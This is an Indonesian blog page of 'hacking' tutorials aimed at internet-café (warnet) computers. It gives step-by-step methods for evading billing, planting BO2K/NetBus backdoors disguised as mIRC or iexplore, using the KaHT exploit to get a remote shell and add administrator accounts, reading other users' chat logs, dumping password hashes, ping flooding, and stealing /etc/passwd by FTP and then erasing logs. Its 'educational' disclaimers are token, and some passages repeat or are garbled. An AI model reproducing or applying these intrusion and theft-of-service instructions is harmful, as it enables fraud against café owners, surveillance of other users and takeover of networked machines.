Sabtu, 22 Mei 2010

Cheat Billing Warnet

Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan...

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan.

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. Siapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.

NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..

Cara kedua

1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008
gampangkan ?

Cara ketiga

Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.

Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan

Download Wincontrol –>> winctrl.exe untuk bypass login screen

Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.

Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.

Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net

Cara keempat

Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali.. (From other)

Nah kalau cara diatas belom juga bikin lho seneng …. Coba lagi aja degh pake KAHT (baca disini). Cara pemakaiannya seperti ini bro mudah-mudahan lho gak lupa lagi:

1. Download program KaHT letakkin di folder c:\windows\system32 (kalo XP)
2. Buka start > run… ketikkan CMD
3. ketikkan : Kaht 127.0.0.1 127.0.0.2
4. Kalo prompt pindah ke system32 berarti berhasil, kalo ga bisa pastiin port yg dipake kaht ga tertutup. Dan kompi kita wajib belom pake SP2
5. Ketik:
net user [username] [userpass] /add
net localgroup Administrator [username] /add
6. Misalnya : Kayaknya udah dijelasin deh, ga usah ya.

- Having fun….. and stay out of trouble...

lihat -lihat server warnet…OK

NB: saya tidak menyuruh jahat atao mengajari hal negatif saya hanya berbagi ilmu dan saya tidak bertanggung jawab atas segala tindakan negatif,tujuan saya adalah berbagi ilmu. minta maaf apabila artikel ini membuat para pemilik warnet marah... Aman ...

Diposting oleh ZWeetH di 02.02 3 komentar
Label:

Cara Menembus Fasilitas Umum Windows Yang Terlalu Dibatasi

Menjengkelkan jika fasilitas ms-dos, run, find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu bt,cara gampangnya adalah kita tembus aja pakek cara ini.

1. Masuk ke notepad / wordpad / ms word
2. Lalu ketik dibawah ini
Regedit4
[hkey_current_user\software\microsoft\windows\currentversion\policies\system]

“disableregistrytools”=dword:00000001
[hkey_current_user\software\microsoft\windows\currentversion\policies\explorer]
“norun”=dword:00000000
3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart. Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan computer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan. ...

Diposting oleh ZWeetH di 02.01 0 komentar
Label:

Cara Masuk Administrator Win XP/2000 Dengan LAN

Kita ingin membuat/menjebol administrator windows xp/2000 di komputer lain melalui lan ? Sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di windows, ketik : net user. Melihat aktif tidaknya guest di windows, ketik : net user guest. Membuat akses guest menjadi administrator dengan perintah, ketik : net localgroup administrators guest /add. Membuat akses adminstrator sendiri,
1. Ketik : net user /add
2. Ketik : net localgroup administrators /add
Menghapus akses administrator, ketik : net localgroup users /delete

Catatan:
*segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali…
Dear moderator & rekan-rekan yang sangat sibuk, Mau sharing ilmu neeh buat rekan-rekan, kali ini mau kasih tau beberapa Tutorial hacker :
1. Cara mengetahui password administrator windows, download proactive windows security Explorer. http://www.crackpassword.com/download/pwsex.zip. sebenarnya cara ini sudah diketahui gue sudah lama,tapi gue belum Mempublikasikannya kepada rekan-rekan. publikasi cara ini juga baru terpikir Saat tutorial program landiscovery diluncurkan. baiklah kita langsung saja. Pertama-tama download lah program proactive windows security explorer, pilih retrive password hashes from, misal registry of local computer. Lalu Kita klik dump, maka password-password administrator windows akan muncul Dibawahnya. jika program ini tidak dapat memuaskan anda, maka anda dapat Menggunakan program password reminder v1.1 dimana tutorialnya juga ada Dihalaman ini. Tujuan dari tutorial ini adalah untuk menginformasikan bagi para pemilik Komputer dengan system operasi windows nt / 2000 / xp agar lebih hati-hati Dengan para pengguna program recovery password administrator windows seperti Ini karena mereka dapat mengakali seluruh komputer anda.


Kita ingin membuat/menjebol administrator windows xp/2000 di komputer lain melalui lan ? Sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di windows, ketik : net user. Melihat aktif tidaknya guest di windows, ketik : net user guest. Membuat akses guest menjadi administrator dengan perintah, ketik : net localgroup administrators guest /add. Membuat akses adminstrator sendiri,
1. Ketik : net user /add
2. Ketik : net localgroup administrators /add
Menghapus akses administrator, ketik : net localgroup users /delete

Catatan:
*segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali…
Dear moderator & rekan-rekan yang sangat sibuk, Mau sharing ilmu neeh buat rekan-rekan, kali ini mau kasih tau beberapa Tutorial hacker :
1. Cara mengetahui password administrator windows, download proactive windows security Explorer. http://www.crackpassword.com/download/pwsex.zip. sebenarnya cara ini sudah diketahui gue sudah lama,tapi gue belum Mempublikasikannya kepada rekan-rekan. publikasi cara ini juga baru terpikir Saat tutorial program landiscovery diluncurkan. baiklah kita langsung saja. Pertama-tama download lah program proactive windows security explorer, pilih retrive password hashes from, misal registry of local computer. Lalu Kita klik dump, maka password-password administrator windows akan muncul Dibawahnya. jika program ini tidak dapat memuaskan anda, maka anda dapat Menggunakan program password reminder v1.1 dimana tutorialnya juga ada Dihalaman ini. Tujuan dari tutorial ini adalah untuk menginformasikan bagi para pemilik Komputer dengan system operasi windows nt / 2000 / xp agar lebih hati-hati Dengan para pengguna program recovery password administrator windows seperti Ini karena mereka dapat mengakali seluruh komputer anda. ...

Diposting oleh ZWeetH di 01.59 1 komentar
Label:

Cara Mengetahui Password Segala Jenis Dokumen Di Komputer

Download passware password recovery 5.3 (1) http://www.geocities.com/yk_family_code/passware2.zip. download passware password recovery 5.3 (3) http://www.geocities.com/yk_family_code/passware3.zip. download passware password recovery 5.3 (4) http://www.geocities.com/yk_family_code/passware4.zip saat ini semua jenis document(s) komputer tidak ada yang aman. saat ini Telah bermunculan berbagai program untuk mengetahui password-password pada Document(s) tersebut baik ms office 95 / 97 / xp / pdf / zip / rar dan masih Banyak lagi. Tujuan dari tutorial ini untuk anda-anda yang pelupa dengan Password-password document, dengan program ini semoga anda dapat mendapatkan Password anda kembali dan tidak lupa lagi mengingat password yang anda buat. ...

Diposting oleh ZWeetH di 01.57 0 komentar
Label:

Cara Mengetahui Pemilik Sebuah Website

Anda ingin mencari pemilik sebuah website ? Cukup mudah caranya dan gampang. Dulu webmaster whois website pakek tukang domain, tapi sekarang dah gak bisa, Ahkirnya gue menemukan website service yang melayani whois pemilik situs, Link untuk mengetahui pemilik situs adalah ?. http://www.nsiregistry.net/whois. untuk mendapatkan tampilan informasi Website, http://www.networksolutions.com/en_us/whois/index.html. untuk mengetahui Si pemilik website tersebut Untuk tambahan anda dapat juga melakukannya di Http://kerangkalangit.com/whois. Tujuan dari tutorial ini agar kita dapat mengenali pemilik website itu lebih Detail sehingga dapat menambah wawasan kita tentang orang-orang dibalik Website tersebut. ...

Diposting oleh ZWeetH di 01.55 0 komentar
Label:

Cara Masuk Di Komputer Lain Lewat Dos (Windows Xp / 2000)

Anda ingin masuk di komputer teman anda dalam sebuah lan ? Bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? Itu mudah, semua caranya ada disini. Pertama-tama anda harus tahu 2 program penting, lalu download lah yaitu internet maniac (internet maniac.exe) download interenet maniac http://sumitbirla.com/network-spy/maniac.zip. Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname. Kaht (kaht.exe) download program hacker kaht http://www.geocities.com/yk_family_code/kaht.zip. Berfungsi sebagai program untuk menerobos ke computer server atau client ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya. Lho bagaimana bisa ? Hehe pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Di download maka ekstractlah dahulu program tersebut, entah pake winzip atau pake apa. Kalo udah di extract lalu ;
1. Untuk windows xp
Cara pertama masuk ke start lalu search, lalu pilih computers or people, lalu pilih a computer on the network, lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.
2. Untuk windows 95/98/me/2000 (kalau anda menemukan open port 135 di os ini)
Cara pertama masuk ke start, lalu search, lalu for files or folders, lalu pada menu search for other item pilihlah computers, lalu akan muncul search for computer, maka langsung klik search now, maka nama-nama computer akan muncul (alternatif cara yang cepat dapat mengklik my network place / network neighboure saja). Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program internet maniac masuklah ke host lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program internet maniac. Kita akan berlanjut dengan program kaht, program ini akan didetect sebagai trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya. Satu lagi, program kaht bekerja dalam ms-dos mode jadi disini kemampuan anda menggunakan dos sangat penting, tanpa kemampuan dos maka anda tidak akan bisa banyak berbuat.
1. Cara masuk dos mode
1. Untuk windows xp :
Masuklah ke start, all programs, accessories lalu command prompt
2. Untuk windows 95/98/me/nt/2000
Masuklah ke start, programs, accessories lalu ms-dos prompt setelah berhasil masuk dos, maka masuklah di directory program kaht, masa sih bisa lupa tadi program diextract dimana. Hehe, (misal tadi di extract di c:\kaht) maka ketikkan “cd\kaht” dan seterusnya. Jika sudah, ini saatnya? Ketikkan “kaht sebelum_no_ip_komputer_sasaran, kalau bingung bisa begini : “kaht ip1 ip2″
Ip1 : ip awal yang discan
Ip2 : ip terahkir yang discan
Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek internet maniac tadi itu lho. Maka ketikkan saja “kaht 192.168.0.0 192.168.0.1″ lalu enter aja. Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe. Nah kalo udah begini kita bisa berkreasi. Pingin biaya warnet kita lebih murah ? Gampang masuk aja di billing server. Ketik time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek mirc di satu warnet / kampus / kantor / lainnya, cari program mirc yang digunakan dalam computer tersebut. Biasanya seh di c:\program files\mirc, buka file mirc.ini, lalu log irc di on kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di c:\program files\mirc program mircnya maka cukup masuk aja di c:\program files\mirc\logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe. Kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja mircnya atau periksa di mirc.ini, gampangkan. Apalagi nih, bikin computer itu rusak, lebih baik jangan, tapi sebenere bias lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas. Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan windows 2000 dan xp di jaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab. ...

Diposting oleh ZWeetH di 01.52 0 komentar
Label:

Cheating With DOS

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan crew diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka crew menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur security tambahan dan perintah hacking interntet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping

2. tracert

3. telnet

4. ftp

5. netstat

OK, inilah keterangannya.

1. ping Utiliy ini digunakan untuk mencari keberadaan remote host. Yang mengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine. Cobalah anda ketik perintah ini: C:\windows>ping/? *************crew’s tip: mengetik ‘/?’ setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.*************Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped. To see statistics and continue - type Control-Break; To stop - type Control-C. -a Resolve addresses to hostnames. -n count Number of echo requests to send. -l size Send buffer size. -f Set Don’t Fragment flag in packet. -i TTL Time To Live. -v TOS Type Of Service. -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list. -w timeout Timeout in milliseconds to wait for each reply. Jadi crew dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh crew mengetik “ping localhost” maka crew mendapatkan. Pinging chintan [127.0.0.1] with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">Reply from 127.0.0.1: bytes=32 time<10ms ttl="128"> Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ************crew’s tip: ‘localhost’ adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt. ***********

Hal ini menunjukkan kepada crew bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128).

Sekarang biar kita lihat apa yang terjadi jika crew mengetik “ping www.situstarget.com”

Pinging teknisoft.or.id [202.XX.13.xx0] with 32 bytes of data:

Reply from 202.XX.13.xx0: bytes=32 time=467ms TTL=58
Reply from 202.XX.13.xx0: bytes=32 time=506ms TTL=58
Reply from 202.XX.13.xx0: bytes=32 time=413ms TTL=58
Reply from 202.XX.13.xx0: bytes=32 time=152ms TTL=58

Ping statistics for 202.67.13.130:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 152ms, Maximum = 506ms, Average = 384ms

Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart. Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos. ***********crew’s tip: ‘Dos’ yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine. ***********Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert, Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching.

Sebagai contoh, jika crew mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat: Tracing route to www.yahoo.akadns.net [66.218.71.87] over a maximum of 30 hops: 1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11] 2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2] 3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177] 4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4] 5 * * * Request timed out. 6 * * * Request timed out. 7 * * * Request timed out. 8 * * * Request timed out. 9 * * * Request timed out. 10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87] 11 * * * Request timed out. 12 * * * Request timed out. 13 * * * Request timed out. 14 * * * Request timed out. 15 * * * Request timed out. 16 * * * Request timed out. 17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87] Trace complete. Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama crew melalui sify.net (nama ISP server crew) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo. Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.

3. Telnet, Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu. ***********crew’s tip: Disini crew membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port. ***********Jika crew mengentik “telnet target.com” maka crew terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika crew ingin terhubung ke port no. 25 (SMTP service) maka crew akan mengetik “telnet target.com 25”.***********crew’s tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services” pada notepad.***********Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang crew dapatkan. crew harus login disana dan mengetik suatu password dan crew mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote. Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.

4. FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb: ! delete literal prompt send? debug ls put statusappend dir mdelete pwd traceascii disconnect mdir quit typebell get mget quote userbinary globe mkdir recv verbosebye hash mls remotehelpcd help mput rename close lcd open rmdir Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah: 1. ‘pwd’ to know the present directory at remote machine. contohnya. ftp>pwd/etc/home2. ‘lcd’ to change the local directory.contohnya. ftp>lcd C:\windowslocal directory now C:\windows3. ‘cd’ to change the remote directory.contohnya. ftp>cd /etcremote directory now /etc 4. ‘mput’ to send multiple files to remote machine.contohnya. ftp>mput *.*sends all files from C:\windows to /etc5. ‘mget’ to get multiple files from remote machine.contohnya. ftp>mget *.*gets all files from /etc to C:\windows6. ‘open’ to establish a connection with remote host.contohnya. ftp>open www.target.com7. ‘bye’ closes the connection and quits from ftp Untuk perintah lainnya dari ftp silakan lihat help mereka. Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.

5. netstat Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan: Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports.-e Displays Ethernet statistics. This may be combined with the -soption.-n Displays addresses and port numbers in numerical form.-p proto Shows connections for the protocol specified by proto; protomay be TCP or UDP. If used with the -s option to displayper-protocol statistics, proto may be TCP, UDP, or IP.-r Displays the routing table.-s Displays per-protocol statistics. By default, statistics areshown for TCP, UDP and IP; the -p option may be used to specifya subset of the default.interval Redisplays selected statistics, pausing interval secondsbetween each display. Press CTRL+C to stop redisplayingstatistics. If omitted, netstat will print the currentconfiguration information once. Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika crew menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. crew mendapatkan hal berikut ini jika crew mengetik “netstat –a” pada command prompt. Active Connections Proto Local Address Foreign Address StateTCP chintan:1027 0.0.0.0:0 LISTENINGTCP chintan:80 0.0.0.0:0 LISTENINGTCP chintan:135 0.0.0.0:0 LISTENINGTCP chintan:6435 0.0.0.0:0 LISTENINGTCP chintan:1025 